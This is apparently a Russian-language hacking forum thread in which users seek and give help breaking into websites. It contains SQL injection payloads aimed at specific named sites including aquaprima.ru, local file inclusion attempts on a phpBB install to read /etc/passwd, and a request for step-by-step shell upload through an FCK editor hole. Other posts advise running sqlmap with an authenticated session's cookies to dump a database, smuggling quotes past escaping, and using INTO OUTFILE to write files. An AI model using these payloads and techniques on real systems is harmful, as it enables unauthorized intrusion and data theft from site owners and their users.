server.com/index.php?id=-1'+OR+`ID`+=+'202 выдает правильную страницу (SELECT * FROM `Films` WHERE `ID` = '-1' OR `ID`='202' LIMIT 1), на нем и тестирую: server.com/index.php?id=-1'+OR+`ID`+=+'202';%00 показывает правильную страницу (ID = 202) без ошибок. Я так понимаю комментирование работает? В чистом виде выдает: DB ERROR: Unknown column '100' in 'order clause' SELECT * FROM `Films` WHERE `ID` = '202' order by 100-- 1' LIMIT 1 c order+by+1 до order+by+9 выдает правильную страницу. Как засунуть туда union select, если при слове select страница отваливается по timeout? Пробовал и в разных регистрах, и со скобками - не работает. Может есть другие запросы для "побаловаться" с базой?
http://www.aquaprima.ru/article_show.php?art_id=199+order+by+1+--+ Невозможно подобрать кол-во столбцов.
http://www.aquaprima.ru/article_show.php?art_id=199+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
есть уязвимость FCK editor Arbitary File upload но когда открываю страницу на которой уязвимост там ничего нету. А Acunetix пишет что загрузил тестовый текст . Можете плз пошагово написать как залить шелл?
Здравствуйте. Вроде локал инклуд но не могу проинклудить... Запрос &language=ru" [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/ru"/common.php) [user.include]: failed to open stream: No such file or directory [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/ru"/common.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') Language file ./language/ru"/common.php couldn't be opened. language=ru../../../../../etc/passwd%00 [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/passwd) [user.include]: failed to open stream: No such file or directory [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') Language file ./language/passwd/common.php couldn't be opened. language=ru../../../../../etc/passwd////кучу слешей///// чистая страниц language=ru../../../etc/passwd/%00 [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/) [user.include]: failed to open stream: Success [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') Language file ./language//common.php couldn't be opened. вывести не выходит не как... помогите советом! или тут не чего не зделаеш? и еще вопрос -есть скуль инжект на сайте но надо авторизоваться чтобы его использовать .есть ли прога, скрипт которая логинится к сайту и потом дампит базу используя скуль инжект ? руками долго очень перебирать база большеватая)
ishenko просто авторизируйся на сайте, залезь в настройки кукисов и посмотри, что там сайт установил. потом используй их в SQLMAP параметр --cookie="тут через ; записываются куки" теперь можешь крутить как авторизированный пользователь
есть уязвимый на скулю скрипт, типа такого $login = $_GET['login']; SELECT id, user_name FROM users WHERE user_login = '$login' ковычки слешируются, как составить любой запрос на выборку данных?
Соглашусь, ибо потестировал! Тебе необходимо еще одно поле (с помощью слэшей коментируется часть запроса). Например:
Можно так-же попробовать двойным url енкодингом попробовать пронести кавычку, но это очень сомнительно, но всё-же..)
при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists</p>. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y. Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
PHP: $login="\' union select 1,2-- "; после слеширования кавычек получается PHP: $login="\\' union select 1,2-- "; \\ - экранированный обратный слеш. ---- Возможно дело в правах выставляемых на файл. То есть он создаётся, но тот от кого выполняется процесс php прочитать его не может. Может быть дело в правах на папке, пробовал /tmp? Если нет то попробуй там создать.
В итоге запрос будет выглядеть вот так: SELECT id, user_name FROM users WHERE user_login = '\' union select 1,2--' Т.е запись \' union select 1,2-- - обычный текст (логин).
Неправильно написал я немного, но по сути верно всё. PHP: <?php $login="\' union select 1,2-- "; //$_GET['login'] $login = str_replace("'", "\'", $login); echo $login; //sql_query... ?> Code: sergey@notebook $ php test.php \\' union select 1,2-- Т.е. запрос SELECT id, user_name FROM users WHERE user_login = '\\' union select 1,2-- ' С точки зрения PHP правильно было бы написать мне тогда PHP: $login="\\\\' union select 1,2-- "; , я же написал значение переменной по факту.
